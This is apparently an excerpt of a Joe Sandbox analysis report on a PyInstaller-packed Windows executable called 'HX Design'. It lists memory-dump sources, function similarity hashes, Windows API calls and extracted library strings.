                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2592636585-0
                                                                                                                                                                                                                                                      • Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                                      • Instruction ID: 6683e266e9d5f0095fe5c692f8cc6772742928eb71ae9f02a736d3f5f36ef597
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 51D0C201F3425552EA44B76BBA4663AD251AF89BC0FD8C035EE5D03B5AEC3CC0458B00
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                                                                                                      • Opcode ID: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
                                                                                                                                                                                                                                                      • Instruction ID: d969cb3757adf44a3f446ca825414f03491994428d20a1b8fceadcaea66ced85
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 508d3c56008b8407d9579c500c6569aa09f18e491ddf20235239c49dae927103
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 05216232A08781C7D3549B26A5406AAB3A5FB88B94F144135EB9D43FA9CF3CD466CB04
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                                                                                                      • Opcode ID: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
                                                                                                                                                                                                                                                      • Instruction ID: 7710f0c7fe72c80de669569d8341e79f0e4461516dd15f80b029d495663d66a9
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e1f5a9259e0aa48b60180f011c1c6fd63c9391dcfad61ef29b2cdf2ae2c5ec5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F216D36E09243CAF766AA26B8412B92390FF45B84F24C430DB0D467FDDE3CE8418651
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorLast
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1452528299-0
                                                                                                                                                                                                                                                      • Opcode ID: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
                                                                                                                                                                                                                                                      • Instruction ID: 85e54d29289d181bc6d9d051e172b1000fb9b62f54871c81a8af6a41be58e138
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 853e6436f94aa431da519847a64e922f1c6e95587a9ca09828f1910c0d29a45c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8EF03C26A08B91C6E2019B16F8002AAA364FB89FC0F184435EF8D47BADCF3CD5418B00
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(?,?,?,00007FF732070C90,?,?,?,00007FF7320722FA,?,?,?,?,?,00007FF732073AE9), ref: 00007FF73207D63A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AllocHeap
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4292702814-0
                                                                                                                                                                                                                                                      • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                      • Instruction ID: e46a7dc5416d65d3a91827f409b30fa18f877e6dfa75c5d0ca93540f6e0bde42
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6CF0F810B09286A5FE647779584167592909F847A0FC80730DD7E862C2EEACA488E630
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                      • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                      • API String ID: 3832162212-3165540532
                                                                                                                                                                                                                                                      • Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                                      • Instruction ID: 0f3fcc71c99d91d152d4c9e453354d3c2ea977a92c1cc27beb717180c93d1ef3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C2D18431B08B82A6EB10AF74E8942BAB760FF84B58F800235DA5D47AA5DF7CD14DD714
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: %s mode not allowed: %s$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                                                                                                                      • API String ID: 4225454184-1067337024
                                                                                                                                                                                                                                                      • Opcode ID: 5f15b9148e8d691bade7ac4299c338194b5adc1f0a67d16e58ed18eaea73a7c4
                                                                                                                                                                                                                                                      • Instruction ID: ccb9ae218590dd4b99ae896eed11a5177d537e398f360437ca77ffe0f8c81baf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f15b9148e8d691bade7ac4299c338194b5adc1f0a67d16e58ed18eaea73a7c4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48023A6AF4E28347FF65BB149030B7967D8AB51B54F264231CA7E4B6E9DE3DE4018300
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A463010
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
                                                                                                                                                                                                                                                      • API String ID: 4225454184-509082904
                                                                                                                                                                                                                                                      • Opcode ID: 538738bbbe174b4041f7e4fb91b9d91a4f947089070179a65c1fdba571175988
                                                                                                                                                                                                                                                      • Instruction ID: 8a66ef2f6b80b9202435378c16568c63210f8783a2092bf37a77361435811080
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 538738bbbe174b4041f7e4fb91b9d91a4f947089070179a65c1fdba571175988
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 10126922B4AA4786EB55AB21A560F7967E1FB84B88F584031DE6E476F8DF3CF4458300
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2104253662.00007FFDFACE1000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDFACE0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104206646.00007FFDFACE0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD2A000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD38000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD87000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD8C000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104253662.00007FFDFAD8F000.00000040.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104600723.00007FFDFAD90000.00000080.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104654670.00007FFDFAD92000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdface0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: 00007A461ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2528831389-0
                                                                                                                                                                                                                                                      • Opcode ID: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
                                                                                                                                                                                                                                                      • Instruction ID: a86ee8f7fac8b57428dce5e7e9d0df6d57beedba53dcee82b3f2b296071a7a67
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c016222525537ec18d5e696995a9a3f380ff0682bd70983648a287384bccb3b7
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DE315E7A718B8186EB648F60E8907ED7364FB84744F00407ADA9E47B99DF38DA88C714
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,00007FF732068919,00007FF732063FA5), ref: 00007FF73206842B
                                                                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684AE
                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684CD
                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684DB
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684EC
                                                                                                                                                                                                                                                      • RemoveDirectoryW.KERNEL32(?,00007FF732068919,00007FF732063FA5), ref: 00007FF7320684F5
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                      • String ID: %s\*
                                                                                                                                                                                                                                                      • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                      • Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                                      • Instruction ID: 692f105b74414b0cf88b93048db4bf81d73cd91066cfb5e7541dae3b84839ba2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33416221B0C542A5EE20BB64F4841BAA3A0FF94754FC00232EA9D83AD4EFBCD54DD764
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB441000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB443000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106375054.00007FFDFB458000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106684657.00007FFDFB45A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106731063.00007FFDFB45C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfb2e0000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: -x0$0123456789ABCDEF0123456789abcdef$VUUU$VUUU
                                                                                                                                                                                                                                                      • API String ID: 0-2031831958
                                                                                                                                                                                                                                                      • Opcode ID: 27ee5c829f6d79043f4cbad637b212a471c0560ebe4aff584a080aef168f4e0b
                                                                                                                                                                                                                                                      • Instruction ID: 746f0727592bb5783a42fd8abebf88d4ced5f086d0a2efd7875ed288a7654f7a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27ee5c829f6d79043f4cbad637b212a471c0560ebe4aff584a080aef168f4e0b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AD13562B1E68386EB648B16D064F7D7BA5FB54784F4A4034DEAE877E9DE2CE400C700
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2108169054.00007FFE00311000.00000040.00000001.01000000.00000011.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108120113.00007FFE00310000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00393000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE00395000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003BD000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003C8000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108169054.00007FFE003D3000.00000040.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108509138.00007FFE003D7000.00000080.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2108558516.00007FFE003D9000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                                                                                                      • Opcode ID: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
                                                                                                                                                                                                                                                      • Instruction ID: b2b9a384e574dc6d01f984c7e87f74cc55a0678ec92fea6ffd2636618f7f6411
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42b55a9a064fc9b9eecda881d5f6a8203af3c995eb229b08bbbd6dd66c50bcf0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2310876609B819AEBA1CF61E8407EE6360FB88744F44403ADB4E47BA9DF3CD648C710
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2103953376.00007FF732061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF732060000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2103908905.00007FF732060000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104011299.00007FF73208B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF73209E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104065242.00007FF7320A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2104158416.00007FF7320A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ff732060000_HX Design.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                                                                                                      • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                                      • Instruction ID: 1ea5c8afbb47ba66bbf64b609c14576a7989d3710ea74ba72c908db5bd70bf6f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD315E72708B8596EB609F60E8803EEB360FB88704F84403ADA5E57B95DFBCD548D724
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2106375054.00007FFDFB2E1000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFB2E0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2106328881.00007FFDFB2E0000.00000002.00000001.01000000.0000000C.sdmpDownload File
